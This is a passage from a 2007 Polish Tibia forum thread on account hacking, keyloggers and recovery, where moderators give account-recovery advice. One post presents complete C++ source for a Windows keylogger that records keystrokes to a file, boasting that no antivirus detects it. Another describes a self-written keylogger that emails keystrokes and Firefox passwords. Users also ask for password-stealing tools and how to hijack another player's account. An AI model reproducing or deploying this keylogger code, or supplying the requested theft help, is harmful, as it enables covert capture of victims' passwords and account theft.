Jesteś tu: Tibia.pl / Forum

Wróć   Forum Tibia.pl > Fora główne > Poradniki

Notki

Poradniki Poradniki napisane przez użytkowników forum.
Podfora : Wasze propozycje poradników ; Poradniki archwialne; Poradniki nie związane z Tibią

Odpowiedz
 
Opcje tematu
stary 21-05-2007, 14:34   #141
fAYL
Użytkownik Forum
 
Data dołączenia: 31 10 2004

Posty: 56
Świat: Premia
Domyślny

Taka mała dygresja nt. keyloggerów. Nie zawsze warto wierzyć antywirom. :)
Wczoraj z nudów postanowiłem napisać sobie prostego KL (ukryte działanie; zbieranie wciśniętych klawiszy i wysyłanie ich co minutę mailem [firewall u mnie i 2 testerów milczał ;) ]; przesyłanie mailem pliku z zapisanymi hasłami w firefoksie).
W sumie pół dnia zabawy, a virustotal jakoś niezbyt dobrze się spisał. ;)

A VBA32 to jakiś mało znany anywir chyba, więc pewnie przypadkiem coś znalazł. :P
fAYL jest offline   Odpowiedz z Cytatem

PAMIĘTAJ! Źródłem utrzymania forum są reklamy. Dziękujemy za uszanowanie ich obecności.
stary 21-05-2007, 16:42   #142
Uther92
Użytkownik Forum
 
Uther92's Avatar
 
Data dołączenia: 19 05 2006
Lokacja: Za górami, za lasami....
Wpisy bloga: 1

Posty: 1,388
Stan: Na Emeryturze
Profesja: Rookstayer
Domyślny

A aj sobie napisałem takie małe proste ale niewykrywalne ścierwo. Ale nie wysyła logów
A-Squared
Found nothing
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Rising Antivirus
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing

Source:
Ukryty tekst:
#include <windows.h>
#include <iostream>

int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{

MSG messages;
MSG msgKomunikat;
msgKomunikat.message = WM_NULL;
while (msgKomunikat.message != WM_QUIT)
{
if (PeekMessage(&msgKomunikat, NULL, 0, 0, PM_REMOVE))
{
TranslateMessage (&msgKomunikat);
DispatchMessage (&msgKomunikat);
}
else
{
short character;
for(character=8;character<=222;character++)
{
if(GetAsyncKeyState(character)==-32767)
{
FILE *file;
if(file=fopen("pozdrawiam Uther .txt","a+"))
{
if((character>=39)&&(character<=64))
{
fputc(character,file);
fclose(file);
break;
}
else if((character>64)&&(character<91))
{
character+=32;
fputc(character,file);
fclose(file);
break;
}
else
{

switch(character)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
fputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[ALT\\CTRL]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[;",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("['\"]",file);
fclose(file);
break;
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}
}
}
}
}
return messages.wParam;
}

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_DESTROY:
PostQuitMessage (0);
break;
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}

return 0;
}
__________________
***
† Jarosław Krasuski (1974-2007)
***
Może wstawisz mi notkę ?
***
Masz problem z keyloggerem ? Nie jesteś pewien co do swojego bezpieczeństwa ? Chętnie ci pomogę
Uther92 jest offline   Odpowiedz z Cytatem
stary 27-05-2007, 00:19   #143
Dawidurud
Zbanowany
 
Dawidurud's Avatar
 
Data dołączenia: 27 05 2007
Lokacja: Wawa

Posty: 19
Stan: Początkujący
Imię: Milvo
Profesja: Knight
Świat: Thoria
Poziom: 102
Skille: 81/75
Poziom mag.: 7
Send a message via Skype™ to Dawidurud
Domyślny

poprostu super poradnik!! dzieki niemu odzyskalemn swoja postac
Dawidurud jest offline   Odpowiedz z Cytatem
stary 02-06-2007, 20:55   #144
Rafal727
Użytkownik Forum
 
Data dołączenia: 02 06 2007

Posty: 30
Stan: Aktywny Gracz
Imię: Saker Eko
Profesja: Royal Paladin
Świat: Selena
Poziom: 70
Problem

Mam pytanie!! Bardzo potrzebuje pomocy!!! Mam numer do konta, ale zapomnielem hasla i nie mam tez hasla do meila na tym koncie Czy moge cos zrobic zeby odzyskac te konto ??? Prosze o pomoc!!!

A zna ktos program ktorym odczytam haslo do tibi z kompa ???

Ostatnio edytowany przez Rafal727 - 02-06-2007 o 22:52.
Rafal727 jest offline   Odpowiedz z Cytatem
stary 03-06-2007, 01:12   #145
thierry
Użytkownik Forum
 
thierry's Avatar
 
Data dołączenia: 22 10 2006
Lokacja: olsztyn
Wiek: 33

Posty: 74
Profesja: Elder Druid
Świat: Harmonia
Poziom: 150
Skille: --
Poziom mag.: 74
Wyślij wiadomość przez ICQ do thierry
Pergamin Co do tego jak odrobić hacka to:

Jeżeli schackowano nas na 70 +poziomie radze isć na dragon lair i pozbierac śmieci (steel shieldy,mace,kusze,p legi itp) średni loot bag to 4-5k
__________________
Chim 120+
Elder Druid
thierry jest offline   Odpowiedz z Cytatem
stary 03-06-2007, 14:22   #146
cieju04
Użytkownik Forum
 
Data dołączenia: 20 03 2007
Lokacja: Tereny PACC

Posty: 74
Stan: Aktywny Gracz
Profesja: Royal Paladin
Domyślny

Mam problem. Kiedyś jak byłem głupi nabrałem się i ściągnąłem plik z rzekomo zdjęciami z questu. Ale poprosiłem tą osobę i zrobiła tak, że mogłem spokojnie wykasować plik. Teraz mineło sporo czasu od tamtego incydentu. Dzis wchodze rano na tibie, patrze a w banku 0 gp. Tyle zostało z około 10k. Dziwne, że tylko to znikło, a nie np pancerz czy guardian shield. I moje pytanie jest takie, czy ta osoba od której ściągnąłem ten plik i zaraz po tym wykasowałem nadal może widzieć moje hasła itd?
cieju04 jest offline   Odpowiedz z Cytatem
stary 03-06-2007, 14:44   #147
balamuta
Użytkownik forum
 
balamuta's Avatar
 
Data dołączenia: 28 04 2007

Posty: 9
Imię: OTS
Profesja: Master Sorcerer
Gildia: OTS
Świat: OTS
Poziom: OTS
Skille: OTS
balamuta ma numer GG 9543557
Domyślny

Mam pytanie bo ja tez miałem podobną sytuację że ściągałem notatnik z Emule pt"Password and account Tibia" nic tam niebylo i to skasowalem i teraz niewiem powiedzcie jak przeskanowac szybko tak jak wy to robicie i piszcie na forum
balamuta jest offline   Odpowiedz z Cytatem
stary 03-06-2007, 16:51   #148
Duch Niespokojny
Moderator
 
Duch Niespokojny's Avatar
 
Data dołączenia: 10 09 2005

Posty: 2,347
Stan: Na Emeryturze
Domyślny

Cytuj:
Oryginalnie napisane przez Rafal727 Pokaż post
Mam pytanie!! Bardzo potrzebuje pomocy!!! Mam numer do konta, ale zapomnielem hasla i nie mam tez hasla do meila na tym koncie Czy moge cos zrobic zeby odzyskac te konto ??? Prosze o pomoc!!!
Są trzy opcje:
a) odzyskać dostęp do konta e-mail,
b) użyć recovery key,
c) pożegnać się z kontem.
Cytuj:
Oryginalnie napisane przez cieju04 Pokaż post
I moje pytanie jest takie, czy ta osoba od której ściągnąłem ten plik i zaraz po tym wykasowałem nadal może widzieć moje hasła itd?
Tak, samo wykasowanie pliku nic nie daje.
Cytuj:
Oryginalnie napisane przez balamuta Pokaż post
Mam pytanie bo ja tez miałem podobną sytuację że ściągałem notatnik z Emule pt"Password and account Tibia" nic tam niebylo i to skasowalem i teraz niewiem powiedzcie jak przeskanowac szybko tak jak wy to robicie i piszcie na forum
Jeżeli to był zwykły plik .txt, to nie widzę problemu...

Ostatnio edytowany przez Duch Niespokojny - 03-06-2007 o 16:55.
Duch Niespokojny jest offline   Odpowiedz z Cytatem
stary 06-06-2007, 19:07   #149
cieju04
Użytkownik Forum
 
Data dołączenia: 20 03 2007
Lokacja: Tereny PACC

Posty: 74
Stan: Aktywny Gracz
Profesja: Royal Paladin
Domyślny

Mam znów problem. Zostałem zhackowany, zmienili mi hasło, ale później je odzyskałem i zmieniłem na swoje tylko, że haker zrobił to co ja i zgłosił account lost. Co mam zrobić? zna mój numer konta. Plx szybką odpowiedź Nie wiem co robić a mam PACC.
cieju04 jest offline   Odpowiedz z Cytatem
stary 06-06-2007, 19:51   #150
Duch Niespokojny
Moderator
 
Duch Niespokojny's Avatar
 
Data dołączenia: 10 09 2005

Posty: 2,347
Stan: Na Emeryturze
Domyślny

Cytuj:
Oryginalnie napisane przez cieju04 Pokaż post
Mam znów problem. Zostałem zhackowany, zmienili mi hasło, ale później je odzyskałem i zmieniłem na swoje tylko, że haker zrobił to co ja i zgłosił account lost. Co mam zrobić? zna mój numer konta. Plx szybką odpowiedź Nie wiem co robić a mam PACC.
Jeżeli "hacker" nie ma dostępu do twojego konta e-mail, to co najwyżej będziesz dostawał maile z prośbą o potwierdzenie żądania przysłania nowego hasła, które możesz zwyczajnie zignorować. Jeśli nie masz dostępu do tego konta emailowego, możesz je zmienić używając recovery key.

Ostatnio edytowany przez Duch Niespokojny - 06-06-2007 o 20:07.
Duch Niespokojny jest offline   Odpowiedz z Cytatem
stary 06-06-2007, 20:23   #151
cieju04
Użytkownik Forum
 
Data dołączenia: 20 03 2007
Lokacja: Tereny PACC

Posty: 74
Stan: Aktywny Gracz
Profesja: Royal Paladin
Domyślny

Cytuj:
Oryginalnie napisane przez Duch Niespokojny Pokaż post
Jeżeli "hacker" nie ma dostępu do twojego konta e-mail, to co najwyżej będziesz dostawał maile z prośbą o potwierdzenie żądania przysłania nowego hasła, które możesz zwyczajnie zignorować. Jeśli nie masz dostępu do tego konta emailowego, możesz je zmienić używając recovery key.
Dzięki stary, nawet nie wiesz jak mi pomogłeś. Wiedziałem, że w tym kraju są porządni ludzie. Jesteś jedną z nim. Już wszystko jest dobrze, sprawa zażegnana
cieju04 jest offline   Odpowiedz z Cytatem
stary 07-06-2007, 22:00   #152
Gravers
Guest
 

Posty: n/a
Smutny

Witam. Otóz mam wielki problem. Shackowali mnie. Odzyskałem konto dzień po
hacku. Dziwi mnie dlaczego hacker niezabrał ŻADNYCH, dosłownie ŻADNYCH itemów? Problem tkwi w tym, że hacker zarejestrował konto. Wpisał w pola jakieś bazgroły, i tu mam pytanie - czy przy rejestracji dostaje się recovery key? Nieposiadam Pacc, więc raczej nie.. tak myśle. Co mam zrobić? Z góry dzięki.
  Odpowiedz z Cytatem
stary 07-06-2007, 23:16   #153
Galeon
Użytkownik Forum
 
Galeon's Avatar
 
Data dołączenia: 17 09 2005
Lokacja: Lublin
Wiek: 31

Posty: 237
Stan: Niegrający
Profesja: Knight
Świat: Refugia
Poziom: 40
Skille: 65/65
Poziom mag.: 5
Galeon ma numer GG 2562220 Send a message via Skype™ to Galeon
Domyślny

@up: ojj jak nie byles zarejestrowany a on to zrobil to ma twoj rec key jezeli ty go nie masz to niestety ale nie pograsz zbyt dlugo jezeli hacker wykorzysta rec key, proste: jakby sie shackowal i zabral all rzeczy ale nie mial rec keya to zmieniasz haselko i grasz dalej... ale jak ma rec key a nic nie zabral to mozesz zbierac sobie kase i grac dalej ale w kazdej chwili moze wejsc ci na konto i ograbic postac dlatego pamietaj zawsze o rejestracji konta jezeli ci na nim zalezy...
__________________


Galeon jest offline   Odpowiedz z Cytatem
stary 07-06-2007, 23:27   #154
Duch Niespokojny
Moderator
 
Duch Niespokojny's Avatar
 
Data dołączenia: 10 09 2005

Posty: 2,347
Stan: Na Emeryturze
Domyślny

Cytuj:
Oryginalnie napisane przez Gravers Pokaż post
Dziwi mnie dlaczego hacker niezabrał ŻADNYCH, dosłownie ŻADNYCH itemów? Problem tkwi w tym, że hacker zarejestrował konto. Wpisał w pola jakieś bazgroły, i tu mam pytanie - czy przy rejestracji dostaje się recovery key? Nieposiadam Pacc, więc raczej nie.. tak myśle. Co mam zrobić? Z góry dzięki.
Krótko: załóż nową postać (na innym koncie oczywiście) i przekaż jej wszystkie rzeczy póki jeszcze możesz, bo na tym koncie już sobie nie pograsz.
Duch Niespokojny jest offline   Odpowiedz z Cytatem
stary 07-06-2007, 23:55   #155
Gravers
Guest
 

Posty: n/a
Domyślny

A jeśli zapłace 5 euro za nowego recovery key? Czy stary recovery key wygaśnie? Baardzo zależy mi na tym koncie. Wiem, że można zdobyć nowy recovery key.
  Odpowiedz z Cytatem
stary 08-06-2007, 11:17   #156
Kill_Bill
Użytkownik Forum
 
Data dołączenia: 02 06 2007
Lokacja: Ab'dendriel

Posty: 32
Stan: Aktywny Gracz
Profesja: Sorcerer
Gildia: Punk team
Świat: Valoria
Poziom: 16
Skille: none/18
Poziom mag.: 12
Wyślij wiadomość przez ICQ do Kill_Bill Kill_Bill ma numer GG 1890185
Strzałka Brawo!!!

wspaniały temat, użyłem praiwe wszystkich programów przez was poleconych, mam pytanie, czy jeśli będę używał 1 antyvir,1firewall,ad-aware i inne to sie nie beda ,,gryzły"?+hijack,regcleaner itp.
__________________
Nie udowadniaj ludziom swojej wartości bo jeśli okaże ona się zbyt duża, będą ci zazdrościć
-------
Dzisiaj, 00:46
Kerston
Ta wiadomość została usunięta przez Wald_Kerius. Powód: Wypier...!! Yyyy..., odejdź w pokoju.
Kill_Bill jest offline   Odpowiedz z Cytatem
stary 08-06-2007, 11:59   #157
Duch Niespokojny
Moderator
 
Duch Niespokojny's Avatar
 
Data dołączenia: 10 09 2005

Posty: 2,347
Stan: Na Emeryturze
Domyślny

Cytuj:
Oryginalnie napisane przez Gravers Pokaż post
A jeśli zapłace 5 euro za nowego recovery key? Czy stary recovery key wygaśnie? Baardzo zależy mi na tym koncie. Wiem, że można zdobyć nowy recovery key.
Nie dostaniesz nowego recovery key, bo konto nie jest zarejestrowane na ciebie. Jeśli wciąż masz dostęp do konta, to możesz co prawda zmienić dane podane przy rejestracji, ale musiałbyś na to czekać miesiąc.
Duch Niespokojny jest offline   Odpowiedz z Cytatem
stary 13-06-2007, 09:04   #158
marek1234
Guest
 

Posty: n/a
Domyślny help

Witam. Prawdopodobnie mam keyloggera na kompie, uzylem programu hijackthis i i znalazlem go(przynajmniej tak mi sie wydaje) znalazlem cos takiego: orcToByloLatwe i jeszcze C:\Windows\services*****.
orca usunelem a ten services usunelem przy pomocy killboxa i teraz jak sprawdzam loga to mi pokazuje ze ten services nadal jest tylko ze teraz w
C:\!KillBox\services*****
i nie wiem czy on jeszcze dziala czy jest usuniety i czy jeszcze cos powinienem zrobic.
prosze o pomoc.
  Odpowiedz z Cytatem
stary 13-06-2007, 09:14   #159
Uther92
Użytkownik Forum
 
Uther92's Avatar
 
Data dołączenia: 19 05 2006
Lokacja: Za górami, za lasami....
Wpisy bloga: 1

Posty: 1,388
Stan: Na Emeryturze
Profesja: Rookstayer
Domyślny

Cytuj:
Oryginalnie napisane przez marek1234 Pokaż post
Witam. Prawdopodobnie mam keyloggera na kompie, uzylem programu hijackthis i i znalazlem go(przynajmniej tak mi sie wydaje) znalazlem cos takiego: orcToByloLatwe i jeszcze C:\Windows\services*****.
orca usunelem a ten services usunelem przy pomocy killboxa i teraz jak sprawdzam loga to mi pokazuje ze ten services nadal jest tylko ze teraz w
C:\!KillBox\services*****
i nie wiem czy on jeszcze dziala czy jest usuniety i czy jeszcze cos powinienem zrobic.
prosze o pomoc.
To backup killbox'a...już nie powinien być groźny. Jak chcesz to usuń
__________________
***
† Jarosław Krasuski (1974-2007)
***
Może wstawisz mi notkę ?
***
Masz problem z keyloggerem ? Nie jesteś pewien co do swojego bezpieczeństwa ? Chętnie ci pomogę
Uther92 jest offline   Odpowiedz z Cytatem
stary 15-06-2007, 12:40   #160
Konrad21
Użytkownik forum
 
Data dołączenia: 15 06 2007

Posty: 6
Pytanie problem

Witam all mam pytanie jak sie tu robi wlasny post bo niewiem ?? aha i tak przy okazji mam prozbe wytlumaczcie mi dokladnie np znam rekowerkeya kolesia w tibi jak go zhakowac prosze pomoc pozdro
Konrad21 jest offline   Odpowiedz z Cytatem
Odpowiedz


Użytkowników czytających ten temat: 1 (zarejestrowanych: 0, gości: 1)
 

Zasady postowania
Nie możesz dodawać tematów
Nie możesz odpowiadać
Nie możesz dodawać załączników
Nie możesz edytować swoich postów

BB Kod jest Włączone
UśmieszkiWłączone
[IMG]Włączone
Kody HTML są Wyłączone
Przejdź do forum


Wszystkie czasy podano w strefie GMT +2. Teraz jest 21:56.


Powered by vBulletin 3